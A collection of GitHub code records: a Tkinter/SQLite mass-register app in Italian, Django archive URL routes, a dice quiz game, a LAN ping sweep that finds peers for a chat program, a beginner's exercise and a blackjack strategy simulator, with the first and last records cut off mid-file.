records:\n if count % 2 == 0:\n my_tree.insert(parent='', index=0, iid=record[0], text='',\n values= (\n record[0],\n record[1],\n record[2],\n record[3]\n ),\n tags=('evenrow'))\n else:\n my_tree.insert(parent='', index=0, iid=record[0], text='',\n values= (\n record[0],\n record[1],\n record[2],\n record[3]\n ),\n tags=('oddrow'))\n count += 1\n\n # Al termine del processo la prima riga risulta evidenziata\n child_id = my_tree.get_children()[0] # la prima riga dall'alto del treeview\n my_tree.focus(child_id) # evidenziata\n my_tree.selection_set(child_id)\n\n # Commit changes\n conn.commit()\n\n # Close our connection\n conn.close()\n\n def query_Suffragi_database_BY_DATE():\n # Clear the Treeview\n for record in my_tree.get_children():\n my_tree.delete(record)\n\n # Create a database or connect to one that exists\n conn = sqlite3.connect('database_messe_orizzontale')\n\n # Create a cursor instance\n c = conn.cursor()\n\n # sql_select_query = \"\"\"select * from TABLE_Messe where Anno = ? and Mese = ? order by ID DESC \"\"\"\n # c.execute(sql_select_query, (2024, 'gennaio',))\n # records = c.fetchall()\n # for x in records:\n # print(x)\n # print('##################################################')\n\n c.execute(\"SELECT * FROM TABLE_Suffragi ORDER BY Anno, (CASE Mese\\\n WHEN 'gennaio' THEN 1\\\n WHEN 'febbraio' THEN 2\\\n WHEN 'marzo' THEN 3\\\n WHEN 'aprile' THEN 4\\\n WHEN 'maggio' THEN 5\\\n WHEN 'giugno' THEN 6\\\n WHEN 'luglio' THEN 7\\\n WHEN 'agosto' THEN 8\\\n WHEN 'settembre' THEN 9\\\n WHEN 'ottobre' THEN 10\\\n WHEN 'novembre' THEN 11\\\n WHEN 'dicembre' THEN 12\\\n END), Suffragi;\")\n\n records = c.fetchall()\n # for x in records:\n # print(x)\n\n # for record in records:\n # print(record)\n # record[0] = id key\n\n # COLORI RIGHE pari e dispari\n # count = 0\n # Create striped row tags\n my_tree.tag_configure('white', background=\"pink\")\n my_tree.tag_configure('blue', background=\"salmon\")\n my_tree.tag_configure('yellow', background=\"lightyellow\")\n my_tree.tag_configure('violet', background=\"khaki\")\n\n for record in records:\n if record[2] == 'gennaio':\n my_tree.insert(parent='', index=0, iid=record[0], text='',\n values=(record[0], record[1], record[2], record[3]),\n tags=('white'))\n elif record[2] == 'febbraio':\n my_tree.insert(parent='', index=0, iid=record[0], text='',\n values=(record[0], record[1], record[2], record[3]),\n tags=('blue'))\n elif record[2] == 'marzo':\n my_tree.insert(parent='', index=0, iid=record[0], text='',\n values=(\n record[0], record[1], record[2], record[3]),\n tags=('yellow'))\n elif record[2] == 'aprile':\n my_tree.insert(parent='', index=0, iid=record[0], text='',\n values=(\n record[0], record[1], record[2], record[3]),\n tags=('violet'))\n elif record[2] == 'maggio':\n my_tree.insert(parent='', index=0, iid=record[0], text='',\n values=(\n record[0], record[1], record[2], record[3]),\n tags=('white'))\n elif record[2] == 'giugno':\n my_tree.insert(parent='', index=0, iid=record[0], text='',\n values=(\n record[0], record[1], record[2], record[3]),\n tags=('blue'))\n elif record[2] == 'luglio':\n my_tree.insert(parent='', index=0, iid=record[0], text='',\n values=(\n record[0], record[1], record[2], record[3]),\n tags=('yellow'))\n elif record[2] == 'agosto':\n my_tree.insert(parent='', index=0, iid=record[0], text='',\n values=(\n record[0], record[1], record[2], record[3]),\n tags=('violet'))\n elif record[2] == 'settembre':\n my_tree.insert(parent='', index=0, iid=record[0], text='',\n values=(\n record[0], record[1], 
record[2], record[3]),\n tags=('white'))\n elif record[2] == 'ottobre':\n my_tree.insert(parent='', index=0, iid=record[0], text='',\n values=(\n record[0], record[1], record[2], record[3]),\n tags=('blue'))\n\n elif record[2] == 'novembre':\n my_tree.insert(parent='', index=0, iid=record[0], text='',\n values=(\n record[0], record[1], record[2], record[3]),\n tags=('yellow'))\n else:\n my_tree.insert(parent='', index=0, iid=record[0], text='',\n values=(record[0], record[1], record[2], record[3]),\n tags=('violet'))\n # count += 1\n\n # Al termine del processo la prima riga risulta evidenziata\n child_id = my_tree.get_children()[0] # la prima riga dall'alto del treeview\n my_tree.focus(child_id) # evidenziata\n my_tree.selection_set(child_id)\n\n # Commit changes\n conn.commit()\n\n # Close our connection\n conn.close()\n\n def remove_one():\n # my_tree.focus() restituisce l'ID della riga selezionata\n row_id = my_tree.focus()\n my_tree.delete(row_id)\n\n # Create a database or connect to one that exists\n conn = sqlite3.connect('database_messe_orizzontale')\n\n # Create a cursor instance\n c = conn.cursor()\n\n # Delete From Database\n c.execute(\"DELETE from TABLE_Suffragi WHERE oid =\" + row_id)\n\n # Commit changes\n conn.commit()\n\n # Close our connection\n conn.close()\n #\n def submit():\n conn = sqlite3.connect('database_messe_orizzontale')\n cur = conn.cursor()\n dati = [Entry_Anno_Suffragi.get(), Entry_Mese_Suffragi.get(), Entry_Suffragi_StringVar.get()]\n dati_suffragi = [Entry_Suffragi_StringVar.get()]\n cur.execute('INSERT INTO TABLE_Suffragi (Anno, Mese, Suffragi) VALUES (?,?,?)', dati)\n\n # cur.execute(\"insert into TABLE_Celebranti (Celebranti) values ('?'), dati\")\n # cur.execute('''INSERT INTO TABLE_Celebranti (Celebranti) VALUES (\"Entry_Celebranti_StringVar.get()\")''')\n conn.commit()\n # Close our connection\n conn.close()\n\n\n B_add_Suffragi = Button(Frame_Suffragi, text='aggiungi', width=10, command=lambda: [submit(), query_suffragi_database()]).grid(row=0,column=3, sticky=W, pady=5)\n B_delete_Suffragi = Button(Frame_Suffragi, text='cancella', width=10, command=remove_one).grid(row=1,column=3, sticky=W)\n B_Tree_Suffragi_sort_by_ID = Button(Frame_Suffragi, text='Sort ID', width=10, command=query_suffragi_database).grid(row=2,column=3, sticky=W)\n B_Tree_Suffragi_sort_by_Date = Button(Frame_Suffragi, text='Sort Data', width=10, command=query_Suffragi_database_BY_DATE).grid(row=3,column=3, sticky=W)\n query_suffragi_database()\n\n\n\nB_add = Button(Frame_tree_Buttons, text='aggiungi', width=10, command=lambda: [submit(), query_database()]).pack(side=TOP, pady=20)\n#B_excel = Button(Frame_tree_Buttons, text='Filtro_excel', width=10, command=sqlite3_to_excel).pack(side=TOP, pady=20)\n#B_update = Button(Frame_tree_Buttons, text='aggiorna', width=10, command='').pack(side=TOP, pady=20)\nB_delete = Button(Frame_tree_Buttons, text='cancella', width=10, command=remove_one).pack(side=TOP, pady=20)\nB_Nomi_Celebranti = Button(Frame_tree_Buttons, text='Celebranti', width=10, command=Top_W_Celebranti).pack(side=BOTTOM, pady=20)\nB_Tree_sort_by_ID=Button(Frame_tree_Buttons, text='Sort ID', width=10, command=query_database).pack(side=TOP, pady=20)\nB_Tree_sort_by_Date=Button(Frame_tree_Buttons, text='Sort Data', width=10, command=lambda: [query_database_BY_DATE()]).pack(side=TOP, 
pady=20)\n\nSuffragi_Comunitari()\nquery_database()\nroot.mainloop()","repo_name":"fragiaco/python_CONTI_01","sub_path":"conti_convento_workinprogress_messe_orizzontale_04.py","file_name":"conti_convento_workinprogress_messe_orizzontale_04.py","file_ext":"py","file_size_in_byte":52667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73104803308","text":"from django.urls import path\nfrom apps.archivero.views import *\n\nurlpatterns = [\n    #routing to list the archive years\n    path('inicio_anios/',Inicio_Anios.as_view(),name='inicio_anios'), \n    path('listaranios/',ListarAnios.as_view(),name='listaranios'), \n    #routing to add/view the archive years\n    path('crearanios/',CrearAnios.as_view(),name='crearanios'), \n    #routing to edit the archive years\n    path(\"actualizaranios/<int:pk>/\",EditarAnios.as_view(), name=\"actualizaranios\"), \n    #routing to delete the archive years\n    path(\"eliminaranios/<int:pk>/\",EliminarAnios.as_view(), name=\"eliminaranios\"), \n\n    #routing to list the archive topics\n    path('inicio_temas/',Inicio_Temas.as_view(),name='inicio_temas'), \n    path('listartemas/',ListarTemas.as_view(),name='listartemas'), \n    #routing to add/view the archive topics\n    path('creartemas/',CrearTemas.as_view(),name='creartemas'), \n    #routing to edit the archive topics\n    path(\"actualizartemas/<int:pk>/\",EditarTemas.as_view(), name=\"actualizartemas\"), \n    #routing to delete the archive topics\n    path(\"eliminartemas/<int:pk>/\",EliminarTemas.as_view(), name=\"eliminartemas\"), \n\n    #routing to list the year-topic relation\n    path('inicio_anios_temas/',Inicio_Anios_Temas.as_view(),name='inicio_anios_temas'), \n    path('listaraniostemas/',ListarAniosTemas.as_view(),name='listaraniostemas'), \n    #routing to add/view the year-topic relation\n    path('crearaniostemas/',CrearAniosTemas.as_view(),name=\"crearaniostemas\"), \n    #routing to edit the year-topic relation\n    path(\"actualizaraniostemas/<int:pk>/\",EditarAniosTemas.as_view(), name=\"actualizaraniostemas\"), \n    #routing to delete the year-topic relation\n    path(\"eliminaraniostemas/<int:pk>/\",EliminarAniosTemas.as_view(), name=\"eliminaraniostemas\"), \n\n\n    #routing to list documents\n    path('inicio_documentos/',Inicio_Documentos.as_view(),name='inicio_documentos'), \n    path('listardocumentos/',ListarDocumentos.as_view(),name='listardocumentos'), \n    #routing to add/view documents\n    path('creardocumentos/',CrearDocumentos.as_view(),name='creardocumentos'), \n    #routing to edit documents\n    path(\"actualizardocumentos/<int:pk>/\",EditarDocumentos.as_view(), name=\"actualizardocumentos\"), \n    #routing to delete documents\n    path(\"eliminardocumentos/<int:pk>/\",EliminarDocumentos.as_view(), name=\"eliminardocumentos\"), \n\n\n    path('vista_documentos/',VistaDocs.as_view(), name=\"vista_documentos\"),\n\n    path('lectura_documentos/',LecturaDocumentos.as_view(), name=\"lectura_documentos\"),\n    path('reporte_documentos/<int:pk>/',ReporteDocumentos.as_view(), name=\"reporte_documentos\"),\n\n\n\n]","repo_name":"kevinitsDevaluado/do","sub_path":"apps/archivero/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2925,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11474472959","text":"import random\nimport time\n\nDICE_WIDTH = 9\nDICE_HEIGHT = 
5\nCANVAS_WIDTH = 79\nCANVAS_HEIGHT = 24 - 3\n\nQUIZ_DURATION = 30\nMIN_DICE = 2\nMAX_DICE = 6\n\nREWARD = 4\nPENALTY = 1\n\nD1 = ([\"+-------+\",\n \"| |\",\n \"| 0 |\",\n \"| |\",\n \"+-------+\"], 1)\nD2a = ([\"+-------+\",\n \"| 0 |\",\n \"| |\",\n \"| 0 |\",\n \"+-------+\"], 2)\nD2b = ([\"+-------+\",\n \"| 0 |\",\n \"| |\",\n \"| 0 |\",\n \"+-------+\"], 2)\nD3a = ([\"+-------+\",\n \"| 0 |\",\n \"| 0 |\",\n \"| 0 |\",\n \"+-------+\"], 3)\nD3b = ([\"+-------+\",\n \"| 0 |\",\n \"| 0 |\",\n \"| 0 |\",\n \"+-------+\"], 3)\nD4 = ([\"+-------+\",\n \"| 0 0 |\",\n \"| |\",\n \"| 0 0 |\",\n \"+-------+\"], 4)\nD5 = ([\"+-------+\",\n \"| 0 0 |\",\n \"| 0 |\",\n \"| 0 0 |\",\n \"+-------+\"], 5)\nD6a = ([\"+-------+\",\n \"| 0 0 |\",\n \"| 0 0 |\",\n \"| 0 0 |\",\n \"+-------+\"], 6)\nD6b = ([\"+-------+\",\n \"| 0 0 0 |\",\n \"| |\",\n \"| 0 0 0 |\",\n \"+-------+\"], 6)\n\nALL_DICE = (D1, D2a, D2b, D3a, D3b, D4, D5, D6a, D6b)\n\ninput(\"Print enter to begin...\")\ncorrectAnswer = incorrectAnswer = 0\nstartTime = time.time()\n# end after \"QUIZ_DURATION\" seconds\nwhile (time.time() < startTime + QUIZ_DURATION):\n sumAnswer = 0\n diceFaces = []\n # create random number of dice\n for i in range(random.randint(MIN_DICE, MAX_DICE)):\n die = random.choice(ALL_DICE)\n diceFaces.append(die[0])\n sumAnswer += die[1]\n \n topLeftDiceCorners = []\n for i in range(len(diceFaces)):\n while (True):\n # locate the dice's places\n left = random.randint(0, CANVAS_WIDTH - 1 - DICE_WIDTH)\n top = random.randint(0, CANVAS_HEIGHT - 1 - DICE_HEIGHT)\n \n topLeftX = left\n topLeftY = top\n topRightX = left + DICE_WIDTH\n topRightY = top\n bottomLeftX = left\n bottomLeftY = top + DICE_HEIGHT\n bottomRightX = left + DICE_WIDTH\n bottomRightY = top + DICE_HEIGHT\n \n # check overlap\n overlaps = False\n for prevDieLeft, prevDieTop in topLeftDiceCorners:\n prevDieRight = prevDieLeft + DICE_WIDTH\n prevDieBottom = prevDieTop + DICE_HEIGHT\n for cornerX, cornerY in ((topLeftX, topLeftY), (topRightX, topRightY), (bottomLeftX, bottomLeftY), (bottomRightX, bottomRightY)):\n if (prevDieLeft <= cornerX < prevDieRight and prevDieTop <= cornerY < prevDieBottom):\n overlaps = True\n \n if (not overlaps):\n topLeftDiceCorners.append((left, top))\n break\n \n # locate the dice\n canvas = {}\n for i, (dieLeft, dieTop) in enumerate(topLeftDiceCorners):\n dieFace = diceFaces[i]\n for dx in range(DICE_WIDTH):\n for dy in range(DICE_HEIGHT):\n canvasX = dieLeft + dx\n canvasY = dieTop + dy\n canvas[(canvasX, canvasY)] = dieFace[dy][dx]\n \n for cy in range(CANVAS_HEIGHT):\n for cx in range(CANVAS_WIDTH):\n print(canvas.get((cx, cy), \" \"), end = \"\")\n print(\"\")\n \n # check the input whether correct\n response = input(\"Enter the sum: \").strip()\n if (response.isdecimal() and int(response) == sumAnswer):\n correctAnswer += 1\n else:\n print(f\"Incorrect, the answer is {sumAnswer}.\")\n time.sleep(2)\n incorrectAnswer += 1\n \n# display result\nscore = correctAnswer * REWARD - incorrectAnswer * PENALTY\nprint(f\"Correct: {correctAnswer}\")\nprint(f\"Incorrect: {incorrectAnswer}\")\nprint(f\"Score: {score}\")","repo_name":"Ming06-22/python_games","sub_path":"dice.py","file_name":"dice.py","file_ext":"py","file_size_in_byte":3845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28233358497","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Mar 20 19:30:19 2022\n\n@author: Marlou\n\"\"\"\n\nimport os\nimport threading\nimport socket\nfrom datetime import 
datetime\n\nglobal dict_Other_users\n\ndict_Other_users = {'IP':[],'Status':[],'Name':[],'MAC':[]}\n\ndef getMyIp():\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) #Create a socket (UDP)\n s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1) # Set the socket up for BROADCAST transmission.\n s.connect(('<broadcast>', 0))\n return s.getsockname()[0]\n\ndef scan_Ip(ip, str_Self_Ip):\n global dict_Other_users\n \n addr = str_Self_Ip + str(ip)\n comm = \"ping -n 1 -a \" + addr\n response = os.popen(comm)\n data = response.readlines()\n\n for line in data:\n if ( '['+ addr +']' ) in line:\n dict_Other_users['IP'].append(addr)\n dict_Other_users['Status'].append('Ping_Ok')\n \n break\n\ndef find_other_users():\n global dict_Other_users\n \n str_Self_Ip = getMyIp()\n print('Your IP :',str_Self_Ip)\n net_split = str_Self_Ip.split('.')\n str_Self_Ip = net_split[0] + '.' + net_split[1] + '.' + net_split[2] + '.'\n \n start_point = 1\n end_point = 255\n print(f'Search from {start_point} to {end_point}')\n \n int_Tine_Start = datetime.now()\n print(\"Scanning in Progress:\")\n print('IP Status Name MAC')\n threads = []\n for ip in range(start_point, end_point):\n # scan_Ip(ip,str_Self_Ip)\n if ip == int(net_split[3]):\n continue\n thread_Target = threading.Thread(target=scan_Ip, args=[ip,str_Self_Ip])\n thread_Target.start()\n threads.append(thread_Target)\n \n # wait for every scan thread to finish, not only the last one started\n for thread_Target in threads:\n thread_Target.join()\n int_Tine_End = datetime.now()\n int_Total_Time = int_Tine_End - int_Tine_Start\n\n print ('Found IPs :',len(dict_Other_users['IP']))\n print(\"Scanning completed in: \", int_Total_Time)\n \n # dict_Other_users = json.dumps(strin,separators='|')\n \nfind_other_users()\n\nprint(dict_Other_users)","repo_name":"MarlouOne/Lan_PTP","sub_path":"Old/PTP_Chat_2.py","file_name":"PTP_Chat_2.py","file_ext":"py","file_size_in_byte":1995,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"13917000962","text":"\n# linhas = int(input(\"Tamanho da arvore? 
\"))\n# tamanho = int(linhas * 2 - 1)\n# espacos = int((tamanho - 1) / 2)\n# i = 1\n \n# while i <= linhas:\n# \tprint (\" \" * (espacos - i + 1), \"*\" * (2 * i - 1))\n# \ti = i + 1\n\n\n# def retorna_guiche_ingresso(ingresso_numero):\n# num_ing=ingresso_numero\n \n \n# qtd=[]\n# num=[] \n# i=0 \n# x=0\n# def valor(): \n# while i <= 6:\n# if(i == 0): \n# qtd.append(0)\n# else:\n# qtd.append(2 * i - 1) \n# i+=1\n \n# def guinche():\n# while i <=6:\n# num.append(i) \n# i+=1\n\n# def teste():(\n# ult=len(qtd)-1\n# if num_ing < soma and num_ing < (soma-qtd):\n# print(\"ok\")\n# else: \n# print(\"No\") \n\n# def mostrar():\n# while x<=6:\n# print (\" Ghinche\",num[x],\"->\", qtd[x]) \n# x+=1\n# soma=sum(qtd)\n# print(soma)\n\n\n\n# num_ing \n\n# return\n \n \n# print(retorna_guiche_ingresso(26))\n\n\n\n#MELHOR VERSAO \n# def retorna_guiche_ingresso(ingresso_numero):\n# num_ing=ingresso_numero\n# qtd=[]\n# num=[] \n# i=0 \n# while i <= 6:\n# if(i == 0): \n# qtd.append(0)\n# else:\n# qtd.append(2 * i - 1) \n# i+=1\n \n# i=0\n# while i <=6:\n# num.append(i) \n# i+=1\n \n# x=0\n# while x<=6:\n# print (\" Ghinche\",num[x],\"->\", qtd[x]) \n# x+=1\n# soma=sum(qtd)\n# print(soma)\n\n# ult=len(qtd)-1\n# ok=sum(qtd)-qtd[ult]\n# if num_ing < soma and num_ing > (qtd[ult]):\n# print(\"Guinche\",ult,ok)\n# else: \n# print(\"No\",ult)\n\n# num_ing \n# return\n \n \n# print(retorna_guiche_ingresso(26))\n\n\n\n\n#Teste \n# def retorna_guiche_ingresso(ingresso_numero):\n# num_ing=ingresso_numero\n# qtd=[]\n# num=[] \n# i=0\n# while True:\n# if(i == 0): \n# qtd.append(0)\n# else:\n# qtd.append(2 * i - 1) \n \n# if num_ing in qtd:\n# print(\"OK\")\n# break\n# False\n# i+=1\n# i+=1\n# print(\"Ola\")\n \n \n# i=0\n # while True:\n # num.append(i) \n # i+=1\n # if num < num_ing:\n # False\n # x=0\n # while True:\n # print (\" Ghinche\",num[x],\"->\", qtd[x]) \n # x+=1\n # if num < num_ing:\n # False\n\n # soma=sum(qtd)\n # print(soma)\n\n # ult=len(qtd)-1\n # ok=sum(qtd)-qtd[ult]\n # if num_ing < soma and num_ing > (qtd[ult]):\n # print(\"Guinche\",ult,ok)\n # else: \n # print(\"No\",ult)\n\n\n\n# num_ing \n\n# return\n \n \n# print(retorna_guiche_ingresso(26))\n\n\ndef retorna_guiche_ingresso(ingresso_numero):\n num_ing=ingresso_numero\n \n #Verifica qual Guinche\n \n \n def teste(x):\n \n num_ing=ingresso_numero\n ingresso=[]\n guinche=[]\n cont=x\n i=0\n while i <=cont:\n guinche.append(i) \n i+=1\n \n #preenche a lista de quat de ingressos por colun\n i=0 \n while i <= cont:\n if(i == 0): \n ingresso.append(0)\n else:\n ingresso.append(2 * i - 1) \n i+=1\n \n \n x=0\n while x<= cont:\n print (\" Ghinche\",guinche[x],\"->\", ingresso[x]) \n x+=1\n\n\n soma=sum(ingresso)\n print(\"SOMA:\",soma)\n\n ultimo=len(ingresso)-1\n print(\"Ultimo Indice Linha:\",ultimo)\n\n \n ulti_num=sum(ingresso)-ingresso[ultimo]\n print(\"Penul Num Coluna\",ulti_num)\n \n pes=ingresso[ultimo]\n print(\"Valor da ultima Coluna \",pes)\n\n if num_ing <= soma and num_ing >= ulti_num:\n print(\"Guinche\",ultimo,num_ing)\n elif num_ing < ulti_num: \n print(\"Guinche2\",ultimo,num_ing)\n print(\"não foi\")\n\n\n teste(num_ing)\n return\n \n \nprint(retorna_guiche_ingresso(3))\n","repo_name":"JadilsonJR/Python","sub_path":"Questoes/ex8/84.py","file_name":"84.py","file_ext":"py","file_size_in_byte":4090,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13845543861","text":"import time\r\nimport random\r\n\r\n# Calculates the possible hand values (soft and hard)\r\n# First checks if 
there are any aces.\r\n# If so, count the number of aces and find every possible pairing of those aces as 1's and 11's\r\n# The possible hand values will be the sum of the rest of the cards (sum(cards) - numAces) + those combinations of 1's and 11's\r\n# Only add hands to the handValues list if it's <= 21 because everything else is a bust. [] implies no non-bust hands i.e. bust\r\n# If no aces, just sum the card values and append if <= 21.\r\ndef calcHandValues(cards):\r\n haveAces = 1 in cards # check if aces in hand\r\n handValues = [] # initially no hands, can only add a hand if it won't bust\r\n if haveAces: # Aces Case\r\n numAces = cards.count(1)\r\n possibleAces = [(x,y) for x in [0,1,2,3,4] for y in [0,1,2,3,4] if x + y == numAces] # make every (x,y) pair of the num of aces counting as 1 or 11 (x -> 1, y -> 11)\r\n temp = sum(cards) - numAces # Ex: I have two aces. (0,2) or (1,1) or (2,0) => two 11's or one 1, one 11 or two 1's\r\n possibleHands = [temp + (x * 1) + (y * 11) for (x,y) in possibleAces] # add the rest of the cards with those possible ace values\r\n for i in possibleHands:\r\n if i <= 21:\r\n handValues.append(i)\r\n else: # No aces (hard hand)\r\n temp = sum(cards) # simply sum the card values\r\n if temp <= 21:\r\n handValues.append(temp)\r\n return handValues\r\n\r\n# Basic Strategy for Soft hands\r\n# Simply copies the logic for the following chart:\r\n# https://www.blackjackapprenticeship.com/wp-content/uploads/2018/10/mini-blackjack-strategy-chart.png\r\ndef basicStrategySoft(handVal, dealerCard):\r\n if handVal > 18:\r\n return \"STAND\"\r\n elif handVal == 18:\r\n if dealerCard in [9,10,1]:\r\n return \"HIT\"\r\n else:\r\n return \"STAND\"\r\n else:\r\n return \"HIT\"\r\n\r\n# Basic Strategy for Hard hands\r\n# Simply copies the logic for the following chart:\r\n# https://www.blackjackapprenticeship.com/wp-content/uploads/2018/10/mini-blackjack-strategy-chart.png\r\ndef basicStrategyHard(handVal, dealerCard):\r\n if handVal >= 17:\r\n return \"STAND\"\r\n elif handVal > 12:\r\n if dealerCard in [6,7,8,9,10,1]:\r\n return \"HIT\"\r\n else:\r\n return \"STAND\"\r\n elif handVal == 12:\r\n if dealerCard in [4,5,6]:\r\n return \"STAND\"\r\n else:\r\n return \"HIT\"\r\n else:\r\n return \"HIT\"\r\n\r\n# Hit or Stand for the Player Decisions\r\n# This is where all the policies are implemented\r\n# This function looks at the player's cards, dealer's cards, and the player policy to make the decision of HIT or STAND\r\ndef hitOrStand(playerCards, dealerCards, policy):\r\n handValues = calcHandValues(playerCards)\r\n # python 3.10 switch case would make this so much cleaner\r\n if policy == 0: # Stand >= 17\r\n for i in handValues:\r\n if i >= 17:\r\n return \"STAND\"\r\n return \"HIT\"\r\n elif policy == 1: # Stand >= Hard 17\r\n if handValues[len(handValues) - 1] >= 17: # last hand value will always be smallest according to calcHandValues (11's used first)\r\n return \"STAND\"\r\n else:\r\n return \"HIT\"\r\n elif policy == 2: # Always Stand\r\n return \"STAND\"\r\n elif policy == 3: # Hit < 21\r\n if handValues[0] < 21:\r\n return \"HIT\"\r\n return \"STAND\"\r\n elif policy == 4: # Hit <= Soft 17 and stand on dealer 4,5,6\r\n if len(handValues) > 1 and handValues[0] == 17:\r\n return \"HIT\"\r\n if dealerCards[0] in [4,5,6]: # if dealer is showing a 4, 5, 6 on first card, stand\r\n return \"STAND\"\r\n else:\r\n return \"HIT\"\r\n elif policy == 5: # Copy the dealer strategy\r\n if len(handValues) > 1 and handValues[0] == 17:\r\n return \"HIT\"\r\n for i in 
handValues:\r\n if i >= 17:\r\n return \"STAND\"\r\n return \"HIT\"\r\n elif policy == 6: # Randomly hit/stand\r\n hit = int(random.random() * 2)\r\n if hit:\r\n return \"HIT\"\r\n else:\r\n return \"STAND\"\r\n else: # Basic Strategy\r\n hasSoft = len(handValues) > 1\r\n if hasSoft:\r\n return basicStrategySoft(handValues[0], dealerCards[0])\r\n else:\r\n return basicStrategyHard(handValues[0], dealerCards[0])\r\n\r\n# Picking cards from a single deck\r\n# This implementation relies on the deck \"losing\" cards as cards are drawn\r\n# What it really does is pick a card from the available cards and swaps that card with the first card available in the deck\r\n# It then increments the firstCard value such that the chosen card (swapped one) is no longer in range\r\n# Ex: [1,2,3,4] Let's say we choose 3.\r\n# [3,2,1,4] Swap 3 and first card i.e. 1.\r\n# firstCard = 0 + 1 = 1 The first available card is now set to index 1, which is 2 so the 3 can no longer be accessed.\r\n# This modified deck and the first card that should be available are returned to maintain the deck across multiple player decisions (multiple HITs).\r\ndef pickCardsSingle(deck, cardAmt, firstCard):\r\n deckLength = 52 - firstCard\r\n for i in range(cardAmt):\r\n card = int(random.random() * deckLength) + firstCard\r\n deck[firstCard], deck[card] = deck[card], deck[firstCard]\r\n firstCard += 1\r\n deckLength = 52 - firstCard\r\n return deck, firstCard\r\n\r\n# SINGLE DECK BLACKJACK\r\n# Sets up the initial deck that the player and dealer will be drawing from.\r\n# Picks two cards which will be the player's.\r\n# Picks two more which will be the dealer's.\r\n# The player performs his decisions first and continues until he decides to STAND, busts, or hits 21.\r\n# Dealer then goes and acts according to the dealer strategy.\r\n# If both the player and dealer don't bust or hit 21, they have a showdown.\r\n# Their biggest hand values are compared and whoever has bigger wins or a tie for equal hands.\r\ndef singleDeck(policy):\r\n deckStart = 0 # initially no cards chosen\r\n deck = [1,1,1,1,2,2,2,2,3,3,3,3,4,4,4,4,5,5,5,5,6,6,6,6,7,7,7,7,8,8,8,8,9,9,9,9,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10] # initial deck\r\n deck, deckStart = pickCardsSingle(deck, 2, deckStart) # update deck and deckStart\r\n playerCards = [deck[0], deck[1]] # player gets the first two cards chosen\r\n\r\n deck, deckStart = pickCardsSingle(deck, 2, deckStart) # update deck and deckStart\r\n dealerCards = [deck[2], deck[3]] # dealer gets next two cards\r\n\r\n playerDecision = \"\"\r\n while playerDecision != \"STAND\": # player makes a decision until he stands, busts, or hits 21\r\n handValues = calcHandValues(playerCards) # calculate handvalues\r\n if handValues == []: # empty handValues means you busted\r\n return False\r\n if handValues[0] == 21: # if 21, player wins\r\n return True\r\n playerDecision = hitOrStand(playerCards, dealerCards, policy) # make player decision\r\n if playerDecision == \"HIT\": # if hit, pick another card and add to player's cards\r\n deck, deckStart = pickCardsSingle(deck, 1, deckStart)\r\n playerCards.append(deck[deckStart - 1])\r\n\r\n dealerDecision = \"\"\r\n while dealerDecision != \"STAND\": # same as player\r\n handValues = calcHandValues(dealerCards)\r\n if handValues == []: # bust\r\n return True\r\n if handValues[0] == 21: # blackjack, win\r\n return False\r\n if handValues[0] == 17 and len(handValues) == 2: # if more than one handValue, then there is a soft hand at index 0\r\n dealerDecision = \"HIT\" # hit on 
soft 17\r\n elif handValues[0] >= 17: # stand on anything > 17 or on hard 17\r\n dealerDecision = \"STAND\"\r\n else:\r\n dealerDecision = \"HIT\" # otherwise (< 17), hit\r\n if dealerDecision == \"HIT\": # if hit, pick a card and add to hand\r\n deck, deckStart = pickCardsSingle(deck, 1, deckStart)\r\n dealerCards.append(deck[deckStart - 1])\r\n\r\n #SHOWDOWN\r\n playerCardValue = calcHandValues(playerCards)[0]\r\n dealerCardValue = calcHandValues(dealerCards)[0]\r\n\r\n # Win = 1\r\n # Loss = 0\r\n # Tie = 2\r\n if playerCardValue > dealerCardValue:\r\n return 1 # player win\r\n elif playerCardValue < dealerCardValue:\r\n return 0 # player loss\r\n else:\r\n return 2 # tie\r\n\r\n# Pick cards from an infinite deck\r\n# Simply defines the possible values for the cards and picks one value randomly\r\n# This could have been simplified with one of each value except 10 which would have four instances for the 10, J, Q, K, but I thought this better represented the idea of choosing any from a complete deck.\r\ndef pickCardsInfinite():\r\n infinite = [1, 1, 1, 1, 2, 2, 2, 2, 3, 3, 3, 3, 4, 4, 4, 4, 5, 5, 5, 5, 6, 6, 6, 6, 7, 7, 7, 7, 8, 8, 8, 8, 9,\r\n 9, 9, 9, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10]\r\n card = int(random.random() * 52)\r\n return infinite[card]\r\n\r\n# INFINITE DECK\r\n# Performs essentially the same game as Single Deck except that cards are drawn using pickCardsInfinite(). No maintaining of deck required.\r\ndef infiniteDeck(policy):\r\n playerCards = [pickCardsInfinite(), pickCardsInfinite()]\r\n\r\n dealerCards = [pickCardsInfinite(), pickCardsInfinite()]\r\n\r\n playerDecision = \"\"\r\n while playerDecision != \"STAND\":\r\n handValues = calcHandValues(playerCards)\r\n if handValues == []:\r\n return False\r\n if handValues[0] == 21:\r\n return True\r\n playerDecision = hitOrStand(playerCards, dealerCards, policy)\r\n if playerDecision == \"HIT\":\r\n playerCards.append(pickCardsInfinite())\r\n\r\n dealerDecision = \"\"\r\n while dealerDecision != \"STAND\":\r\n handValues = calcHandValues(dealerCards)\r\n if handValues == []:\r\n return True # Dealer Bust\r\n if handValues[0] == 21:\r\n return False # Dealer Blackjack\r\n if handValues[0] == 17 and len(handValues) == 2:\r\n dealerDecision = \"HIT\"\r\n elif handValues[0] >= 17:\r\n dealerDecision = \"STAND\"\r\n else:\r\n dealerDecision = \"HIT\"\r\n if dealerDecision == \"HIT\":\r\n dealerCards.append(pickCardsInfinite())\r\n\r\n #SHOWDOWN\r\n playerCardValue = calcHandValues(playerCards)[0]\r\n dealerCardValue = calcHandValues(dealerCards)[0]\r\n\r\n # Win = 1\r\n # Loss = 0\r\n # Tie = 2\r\n if 